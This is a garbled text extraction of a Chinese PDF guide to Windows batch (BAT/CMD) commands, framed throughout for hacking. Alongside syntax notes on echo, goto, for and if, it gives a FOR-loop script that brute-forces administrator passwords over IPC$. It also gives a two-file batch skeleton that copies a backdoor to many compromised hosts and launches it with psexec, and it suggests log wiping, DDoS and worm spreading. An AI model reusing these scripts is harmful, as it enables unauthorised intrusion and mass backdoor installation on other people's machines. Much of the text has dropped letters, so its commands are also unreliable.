《批处理文件BAT、CMD命令大全.pdf》由会员分享,可在线阅读,更多相关《批处理文件BAT、CMD命令大全.pdf(9页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、批处理文件 BT 命令大全 一、简单批处理内部命令简介。Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,ech 命令将显示当前回显设置。语法 ch onoff mssage Saple:ech ff/e helo orld 在实际应用中我们会把这条命令与重定向符号(也称为管道符号,一般用 )结合来实现输入一些命令到特定格式得文件中、这将在以后得例子中体现出来。2。命令 表示不显示 后面得命令,在入侵过程中(例如使用批处理来格式化敌人得硬盘)自然不能让对方瞧到您使用得命令啦。Sample:cho off cho Now intialzi te proram,plea a
2、it minie、format X:/q/u/auost(omt 这个命令就是不可以使用/y 这个参数得,可喜得就是微软留了个 aose这个参数给我们,效果与/y 就是一样得。)3。oto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始得命令。语法:goo lael(lbl 就是参数,指定所要转向得批处理程序中得行。)Sample:f%1=goto nopa i 2=goto noprms(如果这里得 if、%、就就是表示变量。)m eck parametrs f nll sh uage:opam co Usage:monior、bt SvrIP ortNumer got end 标
3、签得名字可以随便起,但就是最好就是有意义得字母啦,字母前加个:用来表示这个字母就是标签,:开头得字符行,在批处理中都被视作标号,而直接忽略其后得所有内容,只就是为了与正常得标号相区别,建议使用 goto 所无法识别得标号,即在:后紧跟一个非字母数字得一个特殊符号。goto 命令就就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样您别人瞧起来才会理解您得意图啊、4、Rem 命令 注释命令,起一个注释得作用,便于别人阅读与您自己日后修改。Re Mes Sample:Rm Hee is he dscriion。、Puse 命令 运行 Pase 命令时,将显示下面得消息:Pres an ky t
4、o contie、。、amle:ho off:bein op a:、*d:back echo Please ut a new dik nto driver A ase oo bin 在这个例子中,驱动器 A 中磁盘上得所有文件均复制到:bak 中。显示得注释提示您将另一张磁盘放入驱动器 A 时,puse 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理、6、all 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标得标签。如果在脚本或批处理文件外使用 all,它将不会在命令行起作用。语法 l ive:ath BatcPamters:labl
5、 aguments 参数 Dive:Pt 指定要调用得批处理程序得位置与名称。参数必须具有、bat 或。md 扩展名。7。srt 命令 调用外部程序,所有得 DOS 命令与命令行程序都可以由tart 命令来调用。入侵常用参数:MN 开始时窗口最小化 SPARATE 在分开得空间内开始 16 位 Winows 程序 HIGH 在 IH 优先级类别开始应用程序 REALME 在 REALIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 araeer 这些为传送到命令/程序得参数 执行得应用程序就是 32位 U 应用程序时,MD。EXE 不等应用程序终止就返回命令提示。如果在命令脚
6、本内执行,该新行为则不会发生。8、choice 命令 coice 使用此命令可以让用户输入一个字符,从而运行不同得命令。使用时应该加/c:参数,c:后应写提示可输入得字符,之间无空格、它得返回码为 234。、如:choice c:me dag,mem,en 将显示 defrag,mem,ndD,M,E?Sple:Sample。at 得内容如下:echo of choce/c:de defra,mem,e i rrolevel oto dera(应先判断数值最高得错误码)if rrreel 2 goto me if errotevel 1 oto end :efra c:dodefrg oto
7、nd:mem em goto en:end echo god bye 此文件运行后,将显示 efrg,em,endD,E?用户可选择 m e,然后f 语句将作出判断,表示执行标号为 defag 得程序段,m 表示执行标号为em 得程序段,e 表示执行标号为ed得程序段,每个程序段最后都以goo e将程序跳到d标号处,然后程序将显示 good bye,文件结束。9、If 命令 表示将判断就是否符合规定得条件,从而决定执行不同得命令。有三种格式:a、i 参数=”字符串 待执行得命令 参数如果等于指定得字符串,则条件成立,运行命令,否则运行下一句。(注意就是两个等号)如 if 1”=formt a:
8、%1=t noparms if 2=got oprs 、i exist 文件名 待执行得命令 如果有指定得文件,则条件成立,运行命令,否则运行下一句。如 if exis config、y edit confg、sy c、if errrlevel/if t errrleel 数字 待执行得命令 如果返回码等于指定得数字,则条件成立,运行命令,否则运行下一句、如 if errorlevl got x DOS 程序运行时都会返回一个数字给 DS,称为错误码 errreel 或称返回码,常见得返回码为 0、1。1、for 命令 fr 命令就是一个比较复杂得命令,主要用于参数在指定得范围内循环执行命令。
9、在批处理文件中使用 FO 命令时,指定变量请使用 variae for%vaale%vriabl in(set)do a mandLineOios vriabl 指定一个单一字母可替换得参数。(set)指定一个或一组文件、可以使用通配符、nd 指定对每个文件执行得命令。mand-paams 为特定命令指定参数或命令行开关。在批处理文件中使用 OR 命令时,指定变量请使用 vaial 而不要用%varile。变量名称就是区分大小写得,所以 i 不同于%I 如果命令扩展名被启用,下列额外得 FR 命令格式会受到 支持:OR/%varible IN(set)D mn mandpraters 如果集中
10、包含通配符,则指定与目录名匹配,而不与文件名匹配。F rive:ah%variale N(set)mnd mnd 检查以 dve:ath 为根得目录树,指向每个目录中得 FR 语句。如果在/R 后没有指定目录,则使用当前目录、如果集仅为一个单点(。)字符,则枚举该目录树。FR/L%variale N(sat,ste,en)DO ma mandpara 该集表示以增量形式从开始到结束得一个数字序列。因此,(1,1,)将产生序列 2 3 4,(5,1,1)将产生 序列(5 4 2 1)。FOR/F”tins”%varial ()DO man FR/F”optins”%variable IN(rin
11、g)DO mad OR/F”optns vribl IN(mand)DO mand 或者,如果有 ubackq 选项:FR/”oion varab N()DO mand FR F”ptons%varabl IN(stig)DO and OR/F”optns vaiale I(d)mand 为一个或多个文件名。继续到 中得 下一个文件之前,每份文件都已被打开、读取并经过处理。处理包括读取文件,将其分成一行行得文字,然后将每行 解析成零或更多得符号。然后用已找到得符号字符串变量值调用 For 循环。以默认方式,/通过每个文件得每一行中分开得第一个空白符号。跳过空白行。您可通过指定可选 optio”
12、参数替代默认解析操作、这个带引号得字符串包括一个或多个指定不同解析选项得关键字。这些关键字为:eolc 指一个行注释字符得结尾(就一个)si=-指在文件开始时忽略得行数。elms=xx 指分隔符集。这个替换了空格与跳格键得默认分隔符集、tokens=x,y,m-指每行得哪一个符号被传递到每个迭代得 fo 本身、这会导致额外变量名称得格式为一个范围。通过 nth 符号指定 m 符号字符串中得最后一个字符星号,那么额外得变量将在最后一个符号解析之分配并接受行得保留文本。uebaq-指定新语法已在下类情况中使用:在作为命令执行一个后引号得字符串并且引号字符为文字字符串命令并允许在 f中使用双引号扩起
13、文件名称。sampe1:F”o;tkes=2,lims=,i in(my)do mand 会分析 my 中得每一行,忽略以分号打头得那些行,将 每行中得第二个与第三个符号传递给 for 程序体;用逗号与或空格定界符号。请注意,这个 f 程序体得语句引用%i 来取得第二个符号,引用 j 来取得第三个符号,引用%来取得第三个符号后得所有剩余符号。对于带有空格得文件名,您需要用双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebck 选项,否则,双引号会被理解成就是用作定义某个要分析得字符串得、i 专门在 fo 语句中得到说明,与 k 就是通过 tokens=选项专门得到说明得。
14、您可以通过 ns=一行指定最多 2 个符号,只要不试图说明一个高于字母 z 或 得变量。请记住,OR 变量就是单一字母、分大小写与全局得;同时不能有 52 个以上都在使用中。您还可以在相邻字符串上使用 FO F 分析逻辑;方法就是,用单引号将括号之间得 括起来。这样,该字符串会被当作一个文件中得一个单一输入行。最后,您可以用 OR/F 命令来分析命令得输出。方法就是,将括号之间得 变成一个反括字符串。该字符串会被当作命令行,传递到一个子 D、EXE,其输出会被抓进内存,并被当作文件分析。因此,以下例子:FR/F useckq delims=i N(e)DO eho i 会枚举当前环境中得环境变
15、量名称。另外,OR 变量参照得替换已被增强。您现在可以使用下列选项语法:I 删除任何引号(”),扩充 I-将%I 扩充到一个完全合格得路径名 d 仅将%扩充到一个驱动器号%pI 仅将 I 扩充到一个路径%I 仅将%I 扩充到一个文件名 xI 仅将%I 扩充到一个文件扩展名 I 扩充得路径只含有短名%I 将%I 扩充到文件得文件属性%tI 将 I 扩充到文件得日期/时间 I-将%I 扩充到文件得大小%$PAT:-查找列在路径环境变量得目录,并将 I 扩充到找到得第一个完全合格得名称。如果环境变量未被定义,或者没有找到文件,此组合键会扩充空字符串 可以组合修饰符来得到多重结果:%dpI 仅将 I
16、扩充到一个驱动器号与路径%nI 仅将%扩充到一个文件名与扩展名%sI 仅将%扩充到一个带有短名得完整路径名%pPAH:i-查找列在路径环境变量得目录,并将 I 扩充到找到得第一个驱动器号与路径。%ftI 将%扩充到类似输出线路得 DR 在以上例子中,I 与 AT 可用其她有效数值代替。%语法用一个有效得 FOR 变量名终止、选取类似 I 得大写变量名比较易读,而且避免与不分大小写得组合键混淆、以上就是S 得官方帮助,下面我们举几个例子来具体说明一下or 命令在入侵中得用途。apl2:利用 Fr 命令来实现对一台目标 Win2主机得暴力密码破解、我们用 net se iipc$”pssor”/u
17、:administratr来尝试这与目标主机进行连接,当成功时记下密码。最主要得命令就是一条:r/f i i(ict、tx)do nt se ipipc i”/:adminitrator 用 i%来表示 admin 得密码,在 dit。txt 中这个取%得值用t use 命令来连接。然后将程序运行结果传递给 fi命令 for/f i%i(ct。txt)o ne se iipc”i/:”ainsttr”id”:命令成功完成D:k、t,这样就o 了、se3:您有没有过手里有大量肉鸡等着您去种后门木马呢?,当数量特别多得时候,原本很开心得一件事都会变得很郁闷:)、文章开头就谈到使用批处理文件,可以简
18、化日常或重复性任务。那么如何实现呢?呵呵,瞧下去您就会明白了、主要命令也只有一条:(在批处理文件中使用 O 命令时,指定变量使用%arable)o/f tken=1,2,3 dems=”%i in(victim、txt)do star call doo、ba%i%j%k toes 得用法请参见上面得 sample1,在这里它表示按顺序将 victim。中得内容传递给 doo。bat 中得参数%i j%k。而 cultivat。bt 无非就就是用 net ue 命令来建立PC连接,并opy 木马后门到 vitim,然后用返回码(If errrlevr)来筛选成功种植后门得主机,并cho 出来,或
19、者cho到指定得文件、des=表示ivtim、txt 中得内容就是一空格来分隔得。我想瞧到这里您也一定明白这 vci。txt 里得内容就是什么样得了。应该根据%j k 表示得对象来排列,一般就就是 p paord uernae。代码雏形:-cut her te save as a bthfile(I call it mai、bt)-echo ff if 1=goo usge or/f”oke=1,2,3 delms=”%i in(ictm。txt)d stat cal IPChack、bat%j k goto end:usge ho r tis batc in do moe、or jus ou
20、bleclick、:end-cut he thn sa as a btchile(I call i ai、bat)-cut here the sv as a bahfi(I call it doo。bat)-net use ip$%3 u:”%2 erorlevel goto faile cho ry to estabis t connectio。、。、。、O cpy dv32、ee%1dmin$sysm32&i t erorevel echo IP%1 USER%2 PWD o、tt p ec 1 c:inntstem2windrv32。xe p*ec 1 net sar indrv2&i
21、not rrorleve 1 ech 1 ackred ko。txt:ailed eco ory an not cnncte t h ictim。-ct he the se as a tchfile(I cal i door、bat)-这只就是一个自动种植后门批处理得雏形,两个批处理与后门程序(Windrv2、x),Sexec。ex需放在统一目录下、批处理内容 尚可扩展,例如:加入清除日志+DDO得功能,加入定时添加用户得功能,更深入一点可以使之具备自动传播功能(蠕虫)、此处不多做叙述,有兴趣得朋友可自行研究、二、如何在批处理文件中使用参数 批处理中可以使用参数,一般从1到 这九个,当有多个参
22、数时需要用shif来移动,这种情况并不多见,我们就不考虑它了。samp1:fomt、bat echo off f%1”=”format a:fort frat a:/q/u/auoset eo pleas ine another is rver A、pause goo fom 这个例子用于连续地格式化几张软盘,所以用得时候需在os 窗口输入 fomt。bat a,呵呵,好像有点画蛇添足了 sample:当我们要建立一个 IPC连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地 i asso userame 当着参数来赋给这个批处理,这样就不用每次都打命令了。ch off net use 1%/:3”注意哦,这里 PASSW就是第二个参数。erroleve eh cnetion ie 怎么样,使用参数还就是比较简单得吧?不好得地方请大家见谅见谅下哈。